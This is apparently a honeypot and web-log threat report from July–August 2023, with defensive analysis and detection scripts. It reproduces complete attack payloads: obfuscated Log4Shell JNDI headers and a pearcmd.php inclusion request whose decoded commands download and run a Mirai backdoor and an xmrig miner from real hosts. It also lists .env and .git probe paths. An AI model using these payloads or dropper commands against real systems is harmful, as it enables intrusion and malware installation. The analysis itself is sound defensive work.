# Overview

Dataset date range: `2023-07-24` to `2023-08-01`

Dataset sampling sources: honeypot systems, web application logs

# Captures

## Web logs

### Probed paths (brute-force / enumeration)

```
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/wp-login.php
/1.php
/phpmyadmin
/ReportServer
/aaa9
/aaa8
/?action=checkLatest
/boaform/admin/formLogin
/.git/config
/.git/index
/YUu9
/eGlE
login.cgi
/admin-app/.env
/back/.env
/cms/.env
/apps/.env
/private/.env
/live_env
/core/.env
/.env.dist
/.env.development
/.env.project
/.env.old
/local/.env
/docker/.env
/shared/.env
/application/.env
/app/.env
/script/.env
/api/.env
/system/.env
/rest/.env
/sources/.env
/cp/.env
/fedex/.env
/laravel/.env
/debug/default/view?panel=config
/frontend_dev.php/$
/?phpinfo=1
/_profiler/phpinfo
/.json
enviroments/.env
/beian.htm
/blog/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/website/wp-includes/wlwmanifest.xml
/news/wp-includes/wlwmanifest.xml
/wp1/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
```

Almost all of these are commodity scanner signatures rather than targeted requests. The `.env` variants (including the misspelt `enviroments/.env`) hunt for exposed framework configuration files and the database, mail and cloud credentials they hold; the `*/wp-includes/wlwmanifest.xml` and `/wp-login.php` requests fingerprint WordPress installs under common sub-directories; `/.git/config` and `/.git/index` test for an exposed repository; `/?phpinfo=1` and `/_profiler/phpinfo` look for PHP configuration disclosure; `/debug/default/view?panel=config` and `/frontend_dev.php` are the Yii2 debug panel and the Symfony development front controller; `/boaform/admin/formLogin` and `login.cgi` are router and CPE login endpoints; `/owa/auth/logon.aspx` is the Exchange Outlook Web App logon page and `/ReportServer` is SQL Server Reporting Services; short random paths such as `/aaa9` or `/eGlE` are typically sent first to detect servers that answer every path with 200, which would make the other probes meaningless; and `/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>` is the ThinkCMF remote code execution probe, where the MD5 of `HelloThinkCMF` in the response confirms that the injected PHP ran.

### Log4j payload in the User-Agent

```
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
```

#### Analysis

The lookup is obfuscated so that the literal string `jndi:ldap` never appears on the wire: each `${env:NaN:-x}` asks Log4j for an environment variable named `NaN` and, because no such variable exists, substitutes the default value `x`. After Log4j expands the inner lookups the header becomes `${jndi:ldap://45.137.203.104:7266/TomcatBypass/Command/Base64/<payload>}`. The `/TomcatBypass/Command/Base64/` URL layout is the one used by the public JNDIExploit LDAP server, which answers the lookup with a gadget that executes the Base64-encoded command on the victim. Detection therefore has to run on the resolved string, or key on `${` together with a `:-` default, rather than on the word `jndi`.

The command decodes to:

```bash
wget -o /tmp/boxshell3 http://172.245.135.175/server/boxshell3 ; curl -o /tmp/boxshell3 http://172.245.135.175/server/boxshell3 ; chmod +x /tmp/boxshell3 ; chmod 777 /tmp/boxshell3 ; /tmp/boxshell3 x86 ; rm -rf /tmp/boxshell3
```

⚠ The downloaded `boxshell3` is detected as `Backdoor/Linux.Mirai.ck`.

Two details matter for incident response. `wget -o` (lower case) writes wget's log to `/tmp/boxshell3` and saves the download as `boxshell3` in the current directory, so it is the following `curl -o` that actually places the binary at `/tmp/boxshell3`. The dropper then launches the binary with the architecture argument `x86` and deletes it, so the malware runs memory-resident and the on-disk artefacts are limited to process memory and a possible leftover `boxshell3` copy in the working directory.

## Honeypot captures

Sample count: 108402

### IP ranking

| IP address | Captures |
| --------------- | ---- |
| 87.251.64.11 | 5929 |
| 89.248.163.212 | 3550 |
| 45.135.232.28 | 2552 |
| 89.248.165.95 | 2144 |
| 141.98.11.119 | 2098 |
| 36.99.136.129 | 1999 |
| 36.99.136.128 | 1991 |
| 36.99.136.136 | 1988 |
| 36.99.136.137 | 1929 |
| 111.7.96.151 | 1916 |
| 111.7.96.150 | 1642 |
| 89.248.163.96 | 1595 |
| 89.248.163.224 | 1568 |
| 123.160.221.16 | 1374 |
| 123.160.221.14 | 1318 |
| 123.160.221.20 | 1310 |
| 111.7.96.149 | 1254 |
| 111.7.96.148 | 1194 |
| 123.160.221.18 | 1193 |
| 111.7.96.147 | 1177 |
| 95.214.53.99 | 1107 |
| 185.81.68.65 | 912 |
| 183.136.225.31 | 697 |
| 185.161.248.31 | 670 |
| 89.248.165.228 | 651 |
| 89.248.165.14 | 600 |
| 89.248.163.203 | 580 |
| 176.113.115.230 | 570 |
| 89.248.165.106 | 522 |
| 80.66.88.14 | 519 |
| 178.159.37.98 | 519 |

### Port ranking

The service column is the conventional assignment for the port, added for orientation; the capture itself does not confirm what was listening.

| Port | Captures | Common service |
| --------------- | ---- | ---- |
| 1433 | 1108 | Microsoft SQL Server |
| 8080 | 757 | HTTP (alternate) |
| 8443 | 502 | HTTPS (alternate) |
| 8081 | 364 | HTTP (alternate) |
| 9200 | 356 | Elasticsearch |
| 5060 | 350 | SIP |
| 5555 | 299 | Android ADB |
| 8888 | 296 | HTTP (alternate) |
| 4433 | 265 | HTTPS (alternate) |
| 3000 | 261 | Development web servers (Node, Grafana) |
| 9090 | 261 | HTTP (alternate), Prometheus, Cockpit |
| 23 | 254 | Telnet |
| 2375 | 251 | Docker API (unauthenticated) |
| 554 | 250 | RTSP |
| 9000 | 248 | php-fpm FastCGI, web consoles |
| 102 | 238 | Siemens S7comm (ISO-TSAP) |
| 2222 | 231 | SSH (alternate) |
| 25 | 227 | SMTP |
| 7777 | 224 | various |
| 82 | 218 | HTTP (alternate) |
| 2096 | 207 | cPanel webmail (TLS) |
| 5432 | 207 | PostgreSQL |
| 3128 | 206 | Squid proxy |
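Several entries in the IP ranking are neighbours in the same /24 (36.99.136.x, 111.7.96.x, 123.160.221.x, 89.248.163.x, 89.248.165.x). A scanner that rotates through adjacent addresses is better described, and better blocked, at the prefix level, while a lone noisy host should be blocked on its own so that unrelated neighbours are not caught. The following is an added example, not part of the report: it folds the ranking rows above into /24 networks and splits the result into prefixes worth blocking whole and hosts to block individually. The input rows are copied from the table; the three-host threshold is an illustrative choice, and a /24 block should still be checked against whois or ASN data before it goes into a production deny list.

```python
"""Collapse a honeypot IP ranking into network prefixes for blocking decisions.

Added example (not from the report).  Rows are (ip, captures) pairs copied
from the IP ranking table above; the aggregation and the thresholds are ours.
"""
import ipaddress
from collections import defaultdict

# (ip, captures) rows copied from the IP ranking table.
IP_RANKING = [
    ("87.251.64.11", 5929), ("89.248.163.212", 3550), ("45.135.232.28", 2552),
    ("89.248.165.95", 2144), ("141.98.11.119", 2098), ("36.99.136.129", 1999),
    ("36.99.136.128", 1991), ("36.99.136.136", 1988), ("36.99.136.137", 1929),
    ("111.7.96.151", 1916), ("111.7.96.150", 1642), ("89.248.163.96", 1595),
    ("89.248.163.224", 1568), ("123.160.221.16", 1374), ("123.160.221.14", 1318),
    ("123.160.221.20", 1310), ("111.7.96.149", 1254), ("111.7.96.148", 1194),
    ("123.160.221.18", 1193), ("111.7.96.147", 1177), ("95.214.53.99", 1107),
    ("185.81.68.65", 912), ("183.136.225.31", 697), ("185.161.248.31", 670),
    ("89.248.165.228", 651), ("89.248.165.14", 600), ("89.248.163.203", 580),
    ("176.113.115.230", 570), ("89.248.165.106", 522), ("80.66.88.14", 519),
    ("178.159.37.98", 519),
]


def aggregate_prefixes(rows, prefixlen=24):
    """Group (ip, hits) rows by their /prefixlen network.

    Returns a list of dicts {network, hosts, members, hits} sorted by total
    hits, descending (ties broken by network string for a stable order).
    """
    groups = defaultdict(lambda: {"members": [], "hits": 0})
    for ip, hits in rows:
        # strict=False lets a host address stand in for its network
        net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
        groups[net]["members"].append(ip)
        groups[net]["hits"] += hits
    out = []
    for net, g in groups.items():
        out.append({
            "network": str(net),
            "hosts": len(g["members"]),
            "members": sorted(g["members"], key=ipaddress.ip_address),
            "hits": g["hits"],
        })
    out.sort(key=lambda a: (-a["hits"], a["network"]))
    return out


def recommend_blocks(aggregated, min_hosts=3):
    """Prefixes with at least min_hosts distinct sources are blocked whole;
    everything else is blocked per host.  Returns (networks, hosts)."""
    networks, hosts = [], []
    for a in aggregated:
        if a["hosts"] >= min_hosts:
            networks.append(a["network"])
        else:
            hosts.extend(a["members"])
    return networks, hosts


if __name__ == "__main__":
    agg = aggregate_prefixes(IP_RANKING)
    for a in agg:
        print(f'{a["network"]:20} hosts={a["hosts"]:<2} hits={a["hits"]}')
    nets, single = recommend_blocks(agg)
    print("block networks:", nets)
    print("block hosts:   ", single)
```

Applied to the ranking above, the five multi-host /24s come out on top by total captures while 87.251.64.11, the single busiest address, stays a host-level block.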
### Mining (xmrig) signatures

#### PHP (pearcmd.php local file inclusion)

```http
GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzEwOS4yMDYuMjQyLjI1MS9kb3dubG9hZC94bXJpZy54ODZfNjQ7IG12IHhtcmlnLng4Nl82NCAuZm94bTsgY2htb2QgK3ggLmZveG07IC4vLmZveG07IGVjaG8gRG9udEdldE1hZE9r"));?>+/tmp/ohhellohttpserver.php HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Host: ***:8090
Upgrade-Insecure-Requests: 1
User-Agent: Custom-HttpClient
```

This is the pearcmd.php inclusion trick. `lang=` is passed to an `include()`, the traversal reaches `/usr/local/lib/php/pearcmd.php` (the path in the official PHP Docker images, whose built-in defaults leave `register_argc_argv` enabled), and because pearcmd builds its `argv` from the query string split on `+`, the remainder is parsed as `config-create /&/<?shell_exec(...)?> /tmp/ohhellohttpserver.php`. That writes a PEAR configuration file containing the PHP tag to `/tmp/ohhellohttpserver.php`; a second inclusion of that file then executes the payload. The `***` masks the honeypot host.

Decoded:

```bash
pkill -9 .foxm; cd /tmp; wget http://109.206.242.251/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm; echo DontGetMadOk
```

It kills any running copy, fetches an xmrig build, renames it to the hidden file `.foxm` and launches it; the `echo` at the end is a completion marker the attacker can look for in the response.

#### Log4j (CVE-2021-44228)

The same obfuscated lookup as in the web logs, sent in `X-Api-Version`, `User-Agent` and `Referer` at once so that whichever header the application logs triggers the expansion. Two callback servers were seen, `45.137.203.104:7266` and `193.111.250.21:6554`, both carrying the same Base64 command (the `boxshell3` dropper decoded above); the `Referer` value is truncated in the capture.

```http
GET / HTTP/1.1
Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.137.203.104:7266/TomcatBy
```

```http
GET / HTTP/1.1
Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBypass/Command/Base64/d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJsIC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0gLXJmIC90bXAvYm94c2hlbGwz}')
Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.250.21:6554/TomcatBy
```
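The report shows only the decoded commands. The following is an added example, not part of the report, that performs the step in between for both the Log4j payload (the User-Agent analysis earlier and the two requests in this section) and the pearcmd request: it expands Log4j lookups innermost-first with the `${prefix:key:-default}` rule, so the `${env:NaN:-j}ndi...` string turns back into `${jndi:ldap://...}`, extracts the callback URL, and pulls the Base64 command out of a JNDIExploit-style `/Command/Base64/<b64>` path or out of the PHP `base64_decode("...")` call. Only the subset of lookup semantics needed here is modelled (defaults for any prefix, `env` variables, `lower`/`upper`); the captured values are copied from this page, nothing else is assumed. The practical point is `is_log4shell`: the raw header never contains `jndi`, so a detection regex must run on the resolved string.

```python
"""De-obfuscate Log4Shell lookup strings and recover the embedded command.

Added example (not from the report).  Log4j expands the innermost ${...}
first; "${env:NaN:-j}" asks for an environment variable named NaN and,
because it is unset, yields the default "j".  That is how the captured
headers spell "jndi:ldap" without ever containing those letters in
sequence.  Modelled here: ":-default" for any prefix, env variables,
lower/upper.  Unresolvable lookups are left in place, as Log4j does.
"""
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

INNER = re.compile(r"\$\{([^${}]*)\}")            # a lookup with no nested lookup inside
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^}]+)\}", re.I)
B64_PATH = re.compile(r"/Command/Base64/([A-Za-z0-9+/=]+)")   # JNDIExploit URL layout
B64_PHP = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')  # pearcmd payload


def _resolve_one(body: str, env: dict) -> Optional[str]:
    """Resolve one lookup body such as 'env:NaN:-j', '::-j' or 'lower:J'.

    Returns None when Log4j would leave the text as it is: the jndi lookup
    itself (that is the payload we want to read out) or an unset variable
    with no ':-default'.
    """
    prefix, _, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return None
    if prefix in ("lower", "upper"):
        return rest.lower() if prefix == "lower" else rest.upper()
    key, has_default, default = rest.partition(":-")
    if prefix == "env" and key in env:
        return env[key]
    return default if has_default else None


def resolve_lookups(s: str, env: Optional[dict] = None, max_rounds: int = 50) -> str:
    """Expand nested lookups innermost-first until the string stops changing."""
    env = env or {}
    for _ in range(max_rounds):
        out, pos, changed = [], 0, False
        for m in INNER.finditer(s):
            val = _resolve_one(m.group(1), env)
            if val is None:
                continue                          # keep this lookup literally
            out.append(s[pos:m.start()])
            out.append(val)
            pos, changed = m.end(), True
        out.append(s[pos:])
        s = "".join(out)
        if not changed:
            break
    return s


def is_log4shell(header_value: str) -> bool:
    """Detection check on the resolved value, not the raw header."""
    return JNDI.search(resolve_lookups(header_value)) is not None


def extract_jndi(header_value: str):
    """(scheme, host, port, path) of the resolved JNDI URL, or None."""
    m = JNDI.search(resolve_lookups(header_value))
    if not m:
        return None
    url = urlsplit(f"{m.group(1).lower()}://{m.group(2)}")
    return m.group(1).lower(), url.hostname, url.port, url.path


def decode_embedded_command(s: str) -> Optional[str]:
    """Shell command carried as Base64 in a JNDIExploit path or a PHP
    base64_decode("...") call; None if neither form is present."""
    m = B64_PATH.search(resolve_lookups(s)) or B64_PHP.search(s)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


# Values copied from the captures on this page (report data, not constructed).
BOXSHELL_B64 = (
    "d2dldCAtbyAvdG1wL2JveHNoZWxsMyBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9ib3hzaGVsbDMgOyBjdXJs"
    "IC1vIC90bXAvYm94c2hlbGwzIGh0dHA6Ly8xNzIuMjQ1LjEzNS4xNzUvc2VydmVyL2JveHNoZWxsMyA7IGNobW9kICt4"
    "IC90bXAvYm94c2hlbGwzIDsgY2htb2QgNzc3IC90bXAvYm94c2hlbGwzIDsgL3RtcC9ib3hzaGVsbDMgeDg2IDsgcm0g"
    "LXJmIC90bXAvYm94c2hlbGwz"
)
LOG4J_UA = ("t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
            "//45.137.203.104:7266/TomcatBypass/Command/Base64/" + BOXSHELL_B64 + "}')")
PEARCMD_QUERY = (
    "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/"
    '<?shell_exec(base64_decode("cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzEwOS4yMDYuMjQy'
    'LjI1MS9kb3dubG9hZC94bXJpZy54ODZfNjQ7IG12IHhtcmlnLng4Nl82NCAuZm94bTsgY2htb2QgK3ggLmZveG07IC4v'
    'LmZveG07IGVjaG8gRG9udEdldE1hZE9r"));?>+/tmp/ohhellohttpserver.php'
)

if __name__ == "__main__":
    print(resolve_lookups(LOG4J_UA))
    print(extract_jndi(LOG4J_UA))
    print(decode_embedded_command(LOG4J_UA))
    print(decode_embedded_command(PEARCMD_QUERY))
```

The resolver deliberately stops at `${jndi:...}` instead of trying to "resolve" it, which is what makes the resolved form safe to feed to a regex; in a WAF or log pipeline the same normalisation should be applied to every header, since the capture above shows the payload duplicated across `X-Api-Version`, `User-Agent` and `Referer`.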
### RDP brute-force usernames

Apart from a handful of real names (`Administr`, `Administrator`, `nmap`, `beio`, `GWTAdmin`, `hello`, `eltons`, `Domain`, `root`), the list is machine-generated: a long run of eight-letter uppercase names, followed by repeating triplets of one nine-letter and two six-letter mixed-case names. That is the signature of one tool producing a throwaway username per attempt rather than a wordlist, and it is a usable detection feature on a real RDP host.

| Username |
| --------------- |
| Administr |
| Administrator |
| nmap |
| beio |
| Administrator |
| GWTAdmin |
| hello |
| PEebYQNNF |
| PQhTjQ |
| aRxCgF |
| KtXbvfPUW |
| zZxJLr |
| VbzFal |
| PvfgFrsfi |
| UmqaDS |
| kVRSAn |
| eltons |
| kvEqHQGKT |
| cgLHpE |
| tzJGsH |
| Domain |
| CJPXfaPRy |
| cudTCe |
| PUwPLD |
| OGECIOAO |
| BSKHDOXE |
| LSPISXGM |
| UEAVQWLY |
| MGDZRKCA |
| ZUNYZGDK |
| CFRWUOSC |
| NGRHWNQT |
| SEFEHPSZ |
| PFGQQRKE |
| NOZZZHKO |
| DOVOBFWY |
| IGXQUPDU |
| WPFEGKCJ |
| DULIDYTA |
| UHSEDFSB |
| JJWUNTLB |
| OMNUMIQU |
| BTZGWXIK |
| MKXPQJKM |
| DWXPZAYP |
| GLRQEKAM |
| DPYRJGNK |
| YSWYXWMC |
| TAJYUGXV |
| NUGHEMWL |
| FFQBOAAB |
| HVDCVRCL |
| NAZRYDUU |
| KCUHKSPL |
| RRYMOMGH |
| KAPKPUSY |
| NZGJCJVJ |
| FYIGKOMV |
| ITAEKYAU |
| OTMTGKOT |
| QOZONXRJ |
| LYCJACHK |
| WQZCIHLT |
| VZMKZAXW |
| EBCWOAXH |
| QMCWGRQQ |
| QXRDGICU |
| USLSASKP |
| RVFZBLFO |
| NSIXJXNV |
| KGPQNNTW |
| URVUQHNM |
| MFIOJOHC |
| SKLMJPHO |
| IDNHQBKE |
| HQVQFJBV |
| VHIPZLKT |
| QEDJGHGZ |
| UYFMPZAO |
| UVPIVFKI |
| TDUAPAQT |
| TQCNBDIK |
| GMCDLUNS |
| VHHLNDGG |
| KDJSRPYS |
| UKVJNDJV |
| FLJVEBFQ |
| VWODOWJM |
| EBVRHMXN |
| PNVVWZCU |
| ETYKNUDQ |
| HPYTNHWB |
| KBUNTMPA |
| ZMWFPGCW |
| XQEXWAFW |
| VBEEEJIB |
| ERPWJGMR |
| YXEXBLGO |
| USKGQRJX |
| CBCPUTYF |
| FHOZVYQH |
| GSBQPNGJ |
| YIRURENP |
| AHGLHCFH |
| OGTWGVIF |
| YXORHMLZ |
| NRKQWUJQ |
| OHXCCNOY |
| GWXUDSMH |
| HAOQTEOZ |
| FSVVVALA |
| OOVLIWJG |
| MEASHMRH |
| HHULLPGR |
| BNJIBNDW |
| LeXJbyfrX |
| gqZIpZ |
| dGgaAz |
| WMZcFcjdk |
| eyCbYw |
| DXcrLn |
| oLjnOgtLY |
| teXprq |
| hUaLal |
| vHObTLybq |
| gykdTe |
| JdHzOj |
| bLPEIBXUL |
| uqGmeT |
| NUfLxy |
| rqbZpjpmf |
| oFEEFJ |
| bsjwUL |
| sTdFwlgba |
| EQxPDk |
| TZyctM |
| EJmwkPCgX |
| gGVsLa |
| EWTjDm |
| UbTymobYq |
| VLrabv |
| seHSqz |
| qlQzpJALa |
| fpdjRW |
| jJqauH |
| XerNVKOqh |
| SgGiTk |
| glIlXj |
| csKMakWjc |
| TeRLIV |
| mdEygB |
| mnsLeXOgZ |
| peAMKJ |
| gPSzlj |
| BNbueBMzo |
| MfcKiX |
| OCpRkF |
| ViZmgJiKn |
| BfNHaP |
| sgUAGf |
| lcJyGGSsD |
| wXQlAZ |
| CclGyG |
| jLdAsOlEg |
| bnkQYL |
| dueIpb |
| SDuZkyoNU |
| ntGcZu |
| yFQPFH |
| root |
| HFbMJGPXd |
| KEOHOf |
| ioGMIl |
| pmZAMgSfm |
| UZJCOx |
| OZGcmt |
| XhQYTmPfx |
| bZqQcX |
| RCtPdF |
| uJToAGOds |
| aveZKm |
| LjIeoi |
| UtpJXAieb |
| RVLgVA |
| ShaUWE |
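On a real Windows host the same activity shows up as Event ID 4625 logon failures, and two signals separate this kind of spray from a user mistyping a password: the sub-status (`0xC0000064`, account does not exist, versus `0xC000006A`, wrong password) and the shape of the names. The following is an added example, not part of the report, that scores each source address over its busiest ten-minute window using both signals; the `looks_generated` rule is tuned to the shapes in the captured list (eight uppercase letters, or mixed-case names with two or more case flips), and the event records are constructed CSV stand-ins for fields pulled from the Security log, with made-up IPs and timestamps.

```python
"""Flag RDP username spraying from Windows logon-failure events.

Added example (not from the report).  Combines the Event ID 4625 sub-status
with a crude shape test for tool-generated usernames, then reports sources
whose busiest window is dominated by either signal.  Records below are
constructed; the usernames are taken from the captured list above.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

NO_SUCH_USER = "0xC0000064"   # 4625 sub-status: user name does not exist
BAD_PASSWORD = "0xC000006A"   # 4625 sub-status: wrong password, account exists


def case_flips(name: str) -> int:
    """Upper<->lower transitions: 'Domain' -> 1, 'PQhTjQ' -> 4, 'aRxCgF' -> 5."""
    letters = [c for c in name if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))


def looks_generated(name: str) -> bool:
    """Shape heuristic tuned to the capture above (assumption, not a standard).

    Real account names such as Administrator, GWTAdmin or Domain have at
    most one case flip and are not long all-uppercase strings.
    """
    if not name.isalpha():
        return False
    if name.isupper() and len(name) >= 8:      # OGECIOAO, BSKHDOXE, ...
        return True
    return case_flips(name) >= 2               # PEebYQNNF, PQhTjQ, aRxCgF, ...


@dataclass
class LogonFailure:
    when: datetime
    source_ip: str
    username: str
    status: str


def parse_events(lines):
    """Parse 'timestamp,source_ip,username,substatus' records."""
    events = []
    for line in lines:
        ts, src, user, status = line.strip().split(",")
        events.append(LogonFailure(datetime.fromisoformat(ts), src, user, status))
    return events


def spray_sources(events, window=timedelta(minutes=10), min_distinct=5,
                  generated_share=0.5, nonexistent_share=0.8):
    """Return {source_ip: stats} for sources whose busiest window looks like a spray."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e.source_ip].append(e)
    flagged = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.when)
        best, start = None, 0
        for end in range(len(evs)):            # sliding time window, keep the one
            while evs[end].when - evs[start].when > window:   # with most distinct users
                start += 1
            window_evs = evs[start:end + 1]
            users = {e.username for e in window_evs}
            if best is None or len(users) > len(best[0]):
                best = (users, window_evs)
        users, window_evs = best
        stats = {
            "distinct_users": len(users),
            "generated_share": sum(map(looks_generated, users)) / len(users),
            "nonexistent_share": sum(e.status == NO_SUCH_USER for e in window_evs) / len(window_evs),
        }
        if stats["distinct_users"] >= min_distinct and (
            stats["generated_share"] >= generated_share
            or stats["nonexistent_share"] >= nonexistent_share
        ):
            flagged[src] = stats
    return flagged


# Constructed sample: a scanner cycling names from the captured list, and an
# office user getting a password wrong.  IPs and timestamps are made up.
SAMPLE_EVENTS = [
    "2023-07-26T02:00:01,198.51.100.23,Administrator,0xC000006A",
    "2023-07-26T02:00:02,198.51.100.23,OGECIOAO,0xC0000064",
    "2023-07-26T02:00:03,198.51.100.23,BSKHDOXE,0xC0000064",
    "2023-07-26T02:00:04,198.51.100.23,PEebYQNNF,0xC0000064",
    "2023-07-26T02:00:05,198.51.100.23,PQhTjQ,0xC0000064",
    "2023-07-26T02:00:06,198.51.100.23,aRxCgF,0xC0000064",
    "2023-07-26T02:00:07,198.51.100.23,root,0xC0000064",
    "2023-07-26T09:15:00,10.0.0.8,j.smith,0xC000006A",
    "2023-07-26T09:15:20,10.0.0.8,j.smith,0xC000006A",
    "2023-07-26T09:15:40,10.0.0.8,jsmith,0xC000006A",
]

if __name__ == "__main__":
    for src, stats in spray_sources(parse_events(SAMPLE_EVENTS)).items():
        print(src, stats)
```

The shape test alone would be too weak in a directory with unusual naming conventions, which is why the nonexistent-account ratio is checked as well; either signal crossing its threshold inside a window with enough distinct names is enough to flag the source.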
## Combined summary

The counts here are on a different scale from the honeypot IP ranking above (for example 89.248.163.212 shows 3550 captures there and 108 here); the report does not state the unit for this table, so treat the two as separate rankings rather than reconciling them. Note also that 66.249.68.69 falls in Google's crawler range (66.249.64.0/19); its "page enumeration" entry is more likely legitimate crawling and should be confirmed with a reverse lookup before it is blocked.

| IP | Type | Count |
| ---------------- | -------- | ---- |
| 89.248.163.212 | honeypot | 108 |
| 220.196.160.0/24 | web log | 71 |
| 141.98.11.119 | honeypot | 65 |
| 89.248.163.96 | honeypot | 50 |
| 89.248.163.224 | honeypot | 48 |
| 180.101.245.0/24 | web log | 29 |
| 185.81.68.65 | honeypot | 28 |
| 36.99.136.136 | honeypot | 21 |
| 36.99.136.129 | honeypot | 20 |
| 178.159.37.98 | honeypot | 16 |
| 36.99.136.137 | honeypot | 16 |
| 80.66.88.14 | honeypot | 16 |
| 141.98.11.58 | honeypot | 14 |
| 36.99.136.128 | honeypot | 12 |
| 59.83.208.0/24 | web log | 12 |
| 87.251.64.11 | honeypot | 11 |
| 176.113.115.230 | honeypot | 10 |
| 45.93.201.57 | honeypot | 8 |
| 117.187.173.84 | honeypot | 7 |
| 117.187.173.96 | honeypot | 7 |
| 180.101.244.0/24 | web log | 7 |
| 3.227.252.118 | web log | 7 |
| 117.187.173.100 | honeypot | 6 |
| 117.187.173.102 | honeypot | 6 |
| 117.187.173.40 | honeypot | 6 |
| 117.187.173.42 | honeypot | 6 |
| 176.113.115.241 | honeypot | 6 |
| 117.187.173.112 | honeypot | 5 |
| 117.187.173.120 | honeypot | 5 |
| 117.187.173.43 | honeypot | 5 |
| 117.187.173.46 | honeypot | 5 |
| 117.187.173.69 | honeypot | 5 |
| 117.187.173.71 | honeypot | 5 |
| 117.187.173.83 | honeypot | 5 |
| 117.187.173.88 | honeypot | 5 |
| 117.187.173.97 | honeypot | 5 |
| 89.248.165.95 | honeypot | 5 |
